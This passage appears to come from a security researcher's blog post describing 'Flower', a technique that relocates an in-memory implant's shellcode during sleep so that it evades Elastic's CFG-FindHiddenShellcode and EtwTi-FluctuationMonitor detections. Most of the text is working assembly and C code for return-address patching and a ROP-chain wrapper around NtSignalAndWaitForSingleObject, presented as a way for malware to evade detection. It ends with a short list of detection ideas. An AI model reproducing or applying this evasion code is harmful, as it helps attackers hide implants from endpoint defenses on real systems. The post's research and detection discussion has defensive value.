Rop[ Inc ]->R9  = U_PTR( &Tmp );  
Inc++;

And then it’s GGs, we only flip the permissions once then free and that’s legit unlike “fluctuation” where we keep on flipping protections forever and ever.

can’t C me

As said previously, this technique still allows for things like stack masking and encryption, and since the only real modification is in the ropchain itself you can use any technique you like to queue the ropchain.

Evasion wise since we slip past those two new POCs without losing features like stack masking etc, it’s a net gain, atleast for now.

what about return addresses ?

If you thought of this, good job :>

After moving, the return addresses on our stack from the nested calls in our beacon still point to the old region we were in prior to “flowing”.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
;; rebase return address of calling function
;; no need to be inlined in [-Os] since we JMP to it
;; (no CALL => no new frame => no new retaddr)
;;
;; will require [-fno-omit-frame-pointer] as we need RBP (frame ptr)
;; to get the return address, the compiler in [-Os] seems to
;; prefer [ rsp + COMPILE_TIME_OFFSET ], which is not
;; function agnostic
;;
;; FwPatchRetAddr( ImgBase* [rcx], NewBase* [rdx] )
FwPatchRetAddr:
    mov r8, [ rbp + 8 ]
    sub r8, rcx
    add r8, rdx
    mov [ rbp + 8 ], r8
    ret

I then use it to return to the caller of Flower without crashing.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
LEAVE:
    //
    // we only want to rebase our return address
    // if a Fw*Obf function failed, meaning we didn't
    // move
    //
    if ( ! NT_SUCCESS( Status ) ) {
        //
        // sleep with KUSER_SHARED_DATA so even if we failed
        // we can ensure that we delayed execution
        // (obv not good nor ideal but could still be important)
        //
        FwSharedSleep( Delay );

    } else FwPatchRetAddr( Ctx.ShcBase, Ctx.NxtBuf );

We need to apply the same idea to NtSignalAndWaitForSingleObject because by the time we’re done waiting for the end object, it’s return address points to the old, and now freed, memory region.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
;; wrapper around [NtSignalAndWaitForSingleObject] to patch our retaddr
;; then JMP to the actual function in NTDLL to queue our CONTEXT based ropchain
;;
;; this is done because after queuing our ropchain, the shellcode
;; will have moved elsewhere in memory, thus if [NtSignalAndWaitForSingleObject]
;; was called directly, it would return to the old, now freed, memory (=> CRASH)
;;
;; FwCtxRopStart( FLOWER_ROPSTART_PRM* [rcx] )
FwRopStart:
    ;; save our return address in a volatile register
    pop r10

    push r12

    ;; setup function args from struct
    mov r12, rcx
    mov r11, [ r12 ]              ; Rcx->Func
    mov rcx, [ r12 + 0x8  ]       ; Rcx->Signal
    mov rdx, [ r12 + 0x10 ]       ; Rcx->Wait
    mov r8,  [ r12 + 0x18 ]       ; Rcx->Alertable
    mov r9,  [ r12 + 0x20 ]       ; Rcx->Timeout

    ;; calculate new return address
    sub r10, [ r12 + 0x28 ]       ; Rcx->ImgBase
    add r10, [ r12 + 0x30 ]       ; Rcx->NewBase

    pop r12

    ;; patch return address of the current frame
    push r10

    ;; JMP to NtSignalAndWaitForSingleObject
    ;;
    ;; we JMP to it instead of CALL'ing it to not generate a
    ;; new frame so we can patch the retaddr of NtSignalAndWaitForSingleObject
    jmp r11         ; Rcx->Func

    ;; no ret since NtSignalAndWaitForSingleObject
    ;; will do it for us.

For easier usage we pass a struct holding our relevant parameters for the function

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
//
// FwRopStart wrapper struct
// idk what type safety is
//
typedef struct _FLOWER_ROPSTART {
    //
    // NtSignalAndWaitForSingleObject + args
    //
    PVOID Func;
    PVOID Signal;
    PVOID Wait;
    PVOID Alertable;
    PVOID TimeOut;

    //
    // retaddr patching
    //
    PVOID ImgBase;
    PVOID NewBase;

} FLOWER_ROPSTART_PRM, *PFLOWER_ROPSTART_PRM;

And to craft said parameter struct I made a helper function to make the usage even easier.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
FUNC NTSTATUS FwRopstartPrm(
        _In_  PFLOWER_CTX Ctx,
        _Out_ PFLOWER_ROPSTART_PRM Prm,
        _In_  HANDLE Event,
        _In_  HANDLE Wait,
        _In_  PVOID OldBase,
        _In_  PVOID NxtBase
) {
    if ( ! Ctx || ! Prm ) {
        return STATUS_UNSUCCESSFUL;
    }

    //
    // NtSignalAndWaitForSingleObject args
    //
    Prm->Func        = Ctx->Win32.NtSignalAndWaitForSingleObject;
    Prm->Signal      = Event;
    Prm->Wait        = Wait;
    Prm->Alertable   = FALSE;
    Prm->TimeOut     = NULL;

    //
    // rebasing info
    //
    Prm->ImgBase     = OldBase;
    Prm->NewBase     = NxtBase;

    return STATUS_SUCCESS;
}

We then use FwRopStart in place of NtSignalAndWaitForSingleObject and it won’t return in the old memory :)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
                FLOWER_ROPSTART_PRM RopPrm = { 0 }

                //
                // ensure struct is zero'd
                //
                MmZero( &RopPrm, sizeof( FLOWER_ROPSTART_PRM ) );
                
                [ ... ]
                //
                // prepare wrapper struct for NtSignalAndWaitForSingleObject
                //
                if ( ! NT_SUCCESS( Status = FwRopstartPrm( Ctx, &RopPrm, Ctx->Evnts.Start, Thread, Ctx->ShcBase, Ctx->NxtBuf ) ) ) {
                    PRINTF( "[FLOWER] [-] Failed to prepare FLOWER_ROPSTART_PRM struct [Status: 0x%lx]\n", Status );
                    goto LEAVE;
                }

                //
                // signal the ropchain to start and wait for the thread to be done
                //
                FwRopStart( RopPrm );

And that’s pretty much it, do know that this assumes the beacon is fully PIC, if you’re using a RDLL you might need to remap every section which is possible but a bit annoying I guess.

You can chain this with other stuff, which is the funny thing about sleep obfuscation, I recommend you check out https://dtsec.us/2023-04-24-Sleep/ if HSB is giving you nightmares, out of scope for this post however.

Either ways, may your malware get jiggy with it now.

demo

below you can find recordings of this technique against CFG-FindHiddenShellcode and EtwTi-FluctuationMonitor (fyi, my vm is kinda slow, I dont know if it was ever shut down)

sillyware vs ELASTIC: round 1

in action against CFG-FindHiddenShellcode

sillyware vs ELASTIC: round 2

in action against EtwTi-FluctuationMonitor

2-0

no comment

caveats

The first caveat would be how you write the code obviously, the more nested your sleep obfuscation routine is (compared to the main function) in your code the more return addresses you’ll have to patch so you don’t jump back into the old location. Not really a big caveat however I thought I would mention this.

The second is more on the practical level: it would be way better for the beacon to be fully PIC and not a RDLL due to the fact that the former will only require to be moved into another RX region whereas a RDLL will basically require to be remapped, this in turn being louder and having a high overhead. U2U as always however.

Also whilst trying to use FOLIAGE through fibers, I, at this time, cannot seem to be able to get it to work, without fibers it works fine however. 5pider told me that Austin was using fibers due to the high stack usage of the cobalt strike beacon, so fibers in our case don’t seem to be relevant when it comes to stealth.

Silly oversight or just limitation ? At this time I am unsure (not like it matters lol)

going beyond

In the realm of in memory evasion, there are many more things to research and this was only one of them. In and off itself this technique still has some flaws whether it’s because I lazily decided to use techniques like EKKO to showcase it or because the behavior is still a bit different from actual JIT. I hope this adds to the table, considering “malware development” is in current times, an overwritten topic.

Austin Hudson (ilove2pwn) made a tweet when it came to CFG-FindHiddenShellcode so I thought I would link it here because even though im doubting it would get around EtwTi-FluctuationMonitor it most certainly would against CFG-FindHiddenShellcode

JIT seems to become more and more the pet peeve of detections such as stack tracing or just memory scanning in general. This shows that it’s something worth elaborating on for both attackers and defenders alike.

detections

There are lots of detection ground on this technique, first of the usage of FOLIAGE/EKKO/ZILEAN to queue the modified ropchain is in itself a bit weird. As far as I know I think ELASTIC is able to detect APCs trying to run NtContinue to indirectly call the necessary functions. Timers being blocking is also something suspicious, which HSB leverages as an IOC. In upcoming times I plan on releasing a version of flower that does not rely on such techniques thus circumventing the need of NtContinue etc.

In itself the following things are possible to detect:

That is where the third presented POC actually becomes interesting, by constructing normal process behavior profiles it would be possible to find the nuance between this and actual JIT.

I have been working on a modulable and more modern usermode memory scanner that tries to hunt for IOCs that aren’t hunted for yet (atleast to my knowledge) blogpost about this soon enough aswell.

le funny

Sleep obfuscation is certainly cool but an easy win is still chilling in a .NET RWX region (“mockingjay” or bring your own RWX section clowns in shambles) as you aren’t stomping anything (no easily spottable discrepancies between the module in memory and on disk), it’s still legit and it’s RWX, great success.

.NET JIT is honestly a very interesting subject, I recommend you check out this blogpost by XPN: https://blog.xpnsec.com/weird-ways-to-execute-dotnet/ and this gist by dylan https://gist.github.com/susMdT/2d13330f6a5bfa482555e22430c0eb82

acknowledgments

I would like to thank first Dylan Tran (dtsec.us) for being an awesome friend, we discussed this idea a while back and he was the first one to try it. He was also the one to proofread my suboptimal english; do give his work a read, as it inspired me and I hope will inspire others aswell.

I would also like to thank ELASTIC for sharing a lot of their detections with the public, I believe this should be standard behavior for every vendor but here we are with most of those vendors being borderline scammers.

(In no special order)

Thank you for reading :)